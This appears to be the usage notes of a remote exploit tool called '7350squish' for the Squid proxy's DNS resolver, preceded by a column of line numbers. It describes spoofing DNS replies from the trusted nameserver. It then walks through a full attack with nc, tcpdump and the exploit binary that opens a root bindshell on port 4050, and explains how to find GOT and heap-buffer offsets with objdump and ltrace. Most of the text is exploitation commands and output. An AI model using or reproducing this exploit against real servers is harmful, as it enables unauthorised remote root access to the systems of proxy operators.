1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
|
exploitation
============
Squid uses the same UDP port all the time for its resolver. You have to find
this port number. Also, you need to find the trusted nameserver and its port
(always 53). Some Squids trust every nameserver, but most (default) do only
trust the default nameserver. So you either have to be in the local LAN or be
able to spoof packets from the trusted nameservers address. The UDP port
number is high ephemeral and for most Linux installations, it is somewhere
around (32768 - 32900). The offsets are tight, you will have to get the exact
stuff or brute long. Since you attack the child process of Squid, which gets
restarted on crash, you have unlimited tries. Each try creates two log entries
in the squid logfile.
Exploitation example:
---------------------
192.168.144.6 is the Squid server, 130.149.17.5 the default nameserver it uses
and trusts.
# tcpdump -n src 192.168.144.6 and udp and dst port 53 &
# (echo "HEAD http://test.ts/ HTTP/1.0" ; echo ) | \
nc 192.168.144.6 3128 >/dev/null
18:57:03.070418 192.168.144.6.32819 > 130.149.17.5.53: 9+ A? test.ts. (25) (DF)
^^^^^
We see the sourceport it uses and the trusted nameserver address.
# ./7350squish -t 3 -p 4050 130.149.17.5:53 192.168.144.6:32819 \
2>&1 >/dev/null
After the packet has been send, we need to trigger the resolver a second time
to let it read our packet.
# (echo "HEAD http://test2.ts/ HTTP/1.0" ; echo) | \
nc 192.168.144.6 3128 >/dev/null
# telnet 192.168.144.6 4050
Trying 192.168.144.6...
Connected to 192.168.144.6.
Escape character is '^]'.
id;
uid=0(root) gid=13(proxy) euid=13(proxy) groups=13(proxy)
On some systems, Squid runs as uid=0 (for some strange reason I've to figure
out), debian sid for example.
offsets
=======
retloc:
-------
Any GOT entry that is used often will do fine:
# objdump --dynamic-reloc /usr/sbin/squid | grep memcpy
080df838 R_386_JUMP_SLOT memcpy
retaddr:
--------
There are multiple places we can return to, but this is the most fixed one
(static lower heap buffer).
# ltrace -o out -p `ps auxwww|egrep "\(squid\)"|awk '{print $2}'`
(on another term, use the squid, as in):
# (echo "HEAD http://www.cow.org/ HTTP/1.0";echo) | nc 127.0.0.1 3128
(now abort the ltrace process).
# grep recvfrom out
Will give output like:
1630 recvfrom(5, 0x080f2c60, 512, 0, 0xbfff79bc) = 116
1630 recvfrom(5, 0x080f2c60, 512, 0, 0xbfff79bc) = -1
^^^^^^^^^^
retaddr = 0x080f2c60 + 0x90 = 0x080f2cf0
alignments:
-----------
The default (0x0182, 288) should be just fine. If not, those are more
difficult to get.
|
